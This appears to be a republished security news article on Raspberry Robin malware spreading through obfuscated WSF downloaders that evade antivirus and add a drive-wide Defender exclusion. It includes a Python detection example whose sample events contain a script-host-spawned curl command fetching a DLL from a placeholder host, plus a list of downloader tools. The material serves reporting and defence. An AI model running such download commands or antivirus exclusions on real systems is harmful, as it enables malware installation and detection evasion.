    Tech Empire Solutions
    Cyber Security

    New malware campaign spreads via WSF files

By techempire

Report, April 10, 2024, Editorial Department, Cybercrime / Malvertising


Cybersecurity researchers have discovered a new wave of Raspberry Robin activity that, since March 2024, has been delivering malware via malicious Windows Script Files (WSF).

    HP Wolf Security researcher Patrick Schläpfer said in a report shared with The Hacker News: “Historically, Raspberry Robin has been known to spread via removable media such as USB hard drives, but over time, its resellers have tried other initial infection vectors.”

Raspberry Robin, also known as the QNAP worm, was first discovered in September 2021 and has evolved in recent years into a downloader for a range of other payloads, including SocGholish, Cobalt Strike, IcedID, BumbleBee, and TrueBot, and it also serves as a precursor to ransomware deployment.


    While the malware was initially distributed via USB devices containing LNK files that retrieved payloads from infected QNAP devices, it has since adopted other methods such as social engineering and malvertising.

Microsoft tracks this activity as an emerging threat cluster called Storm-0856, which has ties to the broader cybercriminal ecosystem, including groups such as Evil Corp, Silence, and TA505.

The latest distribution vector relies on WSF files that are offered for download from a variety of domains and subdomains.

    It is unclear how the attackers directed victims to these URLs, but it is suspected to be through spam or malvertising campaigns.

The heavily obfuscated WSF file acts as a downloader, using the curl command to retrieve the main DLL payload from a remote server, but not before running a series of anti-analysis and anti-VM checks to determine whether it is executing in a virtualized environment.

It also terminates execution if the Windows build number is lower than 17063 (released in December 2017) or if the list of running processes contains antivirus processes associated with Avast, Avira, Bitdefender, Check Point, ESET, or Kaspersky.


In addition, it configures a Microsoft Defender Antivirus exclusion rule to avoid detection: it adds the entire primary drive to the exclusion list, which prevents that drive from being scanned.
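The three behaviours described above (a script host launching curl to fetch a DLL, the WSF itself being executed, and a Defender exclusion covering a whole drive root) are all visible in ordinary Windows telemetry. The following is an added detection example, not code from HP Wolf Security or from the original article; it runs simple correlation rules over constructed sample events shaped like Sysmon Event ID 1 (process creation) and Microsoft Defender Operational Event ID 5007 (configuration change). The event field names, the sample paths, and the `example.invalid` hosts are assumptions made for the example.

```python
import re
from typing import Dict, Iterable, List

# Windows script hosts that execute .wsf/.js/.vbs files.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Living-off-the-land binaries commonly used to pull a second stage.
DOWNLOADERS = {"curl.exe", "bitsadmin.exe", "certutil.exe", "powershell.exe"}

# A Defender exclusion for a bare drive root such as "C:\" or "D:".
# Event ID 5007 records the change as a registry path under Exclusions\Paths.
# The regex deliberately does not match a sub-folder such as "C:\Program Files\App".
DRIVE_ROOT_EXCLUSION = re.compile(
    r"Exclusions\\Paths\\([A-Za-z]:\\?)\s*=", re.IGNORECASE
)

# Constructed sample events (assumption: not real telemetry). Field names mirror
# the Sysmon and Defender event data one would extract from the Windows event log.
SAMPLE_EVENTS: List[Dict] = [
    {"source": "Sysmon", "event_id": 1,
     "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Windows\System32\WScript.exe" "C:\Users\alice\Downloads\invoice.wsf"'},
    {"source": "Sysmon", "event_id": 1,
     "image": r"C:\Windows\System32\curl.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": r"curl.exe -s -o C:\ProgramData\x.dll http://example.invalid/x.dll"},
    {"source": "Defender", "event_id": 5007,
     "message": r"New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = 0x0"},
    # Benign: curl launched from cmd.exe, and a scoped (non-root) exclusion.
    {"source": "Sysmon", "event_id": 1,
     "image": r"C:\Program Files\Git\mingw64\bin\curl.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"curl -O https://example.invalid/file.txt"},
    {"source": "Defender", "event_id": 5007,
     "message": r"New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files\App = 0x0"},
]


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: Iterable[Dict]) -> List[Dict]:
    """Return one alert per matching event, in input order."""
    alerts: List[Dict] = []
    for ev in events:
        if ev["source"] == "Sysmon" and ev["event_id"] == 1:
            image = _basename(ev["image"])
            parent = _basename(ev["parent_image"])
            # Rule 1: a script host executing a .wsf file from the command line.
            if image in SCRIPT_HOSTS and re.search(r"\.wsf\b", ev["command_line"], re.IGNORECASE):
                alerts.append({"rule": "wsf_executed", "command_line": ev["command_line"]})
            # Rule 2: the script host is the parent of a download utility.
            if parent in SCRIPT_HOSTS and image in DOWNLOADERS:
                alerts.append({"rule": "script_host_spawned_downloader",
                               "parent": parent, "image": image,
                               "command_line": ev["command_line"]})
        elif ev["source"] == "Defender" and ev["event_id"] == 5007:
            # Rule 3: a whole drive added to the Defender path exclusions.
            m = DRIVE_ROOT_EXCLUSION.search(ev["message"])
            if m:
                alerts.append({"rule": "defender_drive_root_exclusion", "path": m.group(1)})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Rule 3 alone is a strong signal on most fleets, since legitimate software rarely excludes an entire volume; rules 1 and 2 are noisier on their own and are best treated as a chain (same host, short time window) rather than as independent alerts.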

“The scripts themselves are not currently classified as malicious by any virus scanner on VirusTotal, indicating that the malware is evasive and has the potential to cause serious infections with Raspberry Robin,” HP said.

    “The WSF downloader is heavily obfuscated and uses many analysis techniques, allowing the malware to evade detection and slow down analysis.”
